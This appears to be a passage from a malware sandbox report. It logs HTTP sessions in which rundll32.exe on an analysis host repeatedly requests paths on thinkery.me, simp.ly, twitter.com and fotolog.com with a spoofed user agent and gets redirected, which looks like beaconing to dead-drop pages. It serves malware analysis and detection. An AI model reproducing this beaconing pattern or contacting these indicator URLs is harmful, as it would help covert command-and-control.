                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=CBYt3Lg%2FfL%2FBQduMec09B0rMMenhQVUIIPZUPgpy9feVbtd7gIjrnogiJsUWAdYmCRcM6zBTEzTSeJqjsM4K4Pd7lUQkq%2F0JGKvoB6z21lc%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3c499fd92056-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                64192.168.2.6498895.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:07.491931915 CET6890OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:07.563075066 CET6891INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:07 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                65192.168.2.649891192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:08.340152979 CET6902OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:08.512331963 CET6902INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:08 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                66192.168.2.649893104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:09.316884995 CET6911OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:09.485480070 CET6912INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:09 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_fHJcQYJaW8j9rIOT97S4tg=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:09 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403390941716669; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:09 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 1685f35f025c11e988aab473807f8c06
                                                                                                                                                x-response-time: 111


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                67192.168.2.649896172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:10.216345072 CET6923OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:11.201181889 CET6924INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:11 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:10 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d8411ee00000b7454a58000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=p7hs8kKMCQvwVt8Rj74pt%2BPd7Tq7hszdQijQQu4UwDQoMWIDLHWHxKLv6A5YvxFnvztjouBlIwrj0uTbN30RE0NHGkf%2FekZkdvs0XV5Qtcw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3c631e3f0b74-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                68192.168.2.6498985.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:12.170429945 CET6972OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:12.238986969 CET6972INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:12 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                69192.168.2.649900192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:13.002784967 CET6984OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:13.170433998 CET6984INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:13 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                7192.168.2.649740172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:04.883068085 CET1460OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:05.456563950 CET1463INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:05 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:05 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d8312b900004bddb7a6c000000001
                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=F65jecCf6TMZ%2FEUBYcAUhf1xIYGdv59mWVF%2FcM3I2Od2BSyXYb9cMdkqe5qZFHq2d2BkW7bosRXsdNtNdoaalD2QIf%2FxSg5MXjumabTJwZE%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3acacd0c4bdd-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                70192.168.2.649902104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:13.907746077 CET6993OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:14.079022884 CET6993INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:14 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_/rhKUYDDEhQV9riLgnEsLQ=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:14 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403391400931799; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:14 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: fde8afc224c8b703c28f8442863cf76a
                                                                                                                                                x-response-time: 115


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                71192.168.2.649905172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:14.765461922 CET7005OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:15.339905024 CET7006INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:15 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:15 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d8423b500000b7c2790b000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sJQUwJzu%2FepbKnLqx%2Bqvuzz62JeX7MwXiHOrMPJjFbIeZ8unwONdiiZQK%2BsSjoVmEwtIXtvIVc1ctOM%2Fb2rbDMtv7p1gFMxWyrO44qKiQcs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3c7f88710b7c-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                72192.168.2.6499075.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:16.259968042 CET7036OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:16.331859112 CET7036INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:16 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                73192.168.2.649909192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:17.116367102 CET7047OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:17.285003901 CET7048INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:17 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                74192.168.2.649911104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:17.912303925 CET7056OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:18.082604885 CET7057INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:18 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_AG+KXSt5SMASEvmri3sYKg=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:18 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403391801463050; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:18 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 29ac8546b0bcc488d43774a24cb4c5a6
                                                                                                                                                x-response-time: 113


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                75192.168.2.649914172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:18.769565105 CET7068OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:19.235256910 CET7069INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:19 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:18 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d84335700000b6ba223f000000001
                                                                                                                                                Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wDG%2BBvkGs38sXh0tPEqfXx0qStcgaV5oZvBI5SiBRWwegT66boxeatKslo08SF5SfzTMwQpvsPHmdP9tC99Q48xdB2LCX0M9LDFYxIMoqxs%3D"}]}
                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3c988efc0b6b-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                76192.168.2.6499165.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:20.078378916 CET7117OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:20.150072098 CET7118INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:20 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                77192.168.2.649918192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:21.105627060 CET7129OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:21.273154974 CET7129INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:21 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                78192.168.2.649920104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:22.890870094 CET7135OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:23.059992075 CET7136INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:23 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_XJ2FRuvkmiDNhOMD1Ko1Cg=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:22 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403392299106752; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:22 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 31ec29e0459f9ccfcaa4c60d4896434b
                                                                                                                                                x-response-time: 113


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                79192.168.2.649923172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:23.739429951 CET7147OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:24.314865112 CET7148INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:24 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:24 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
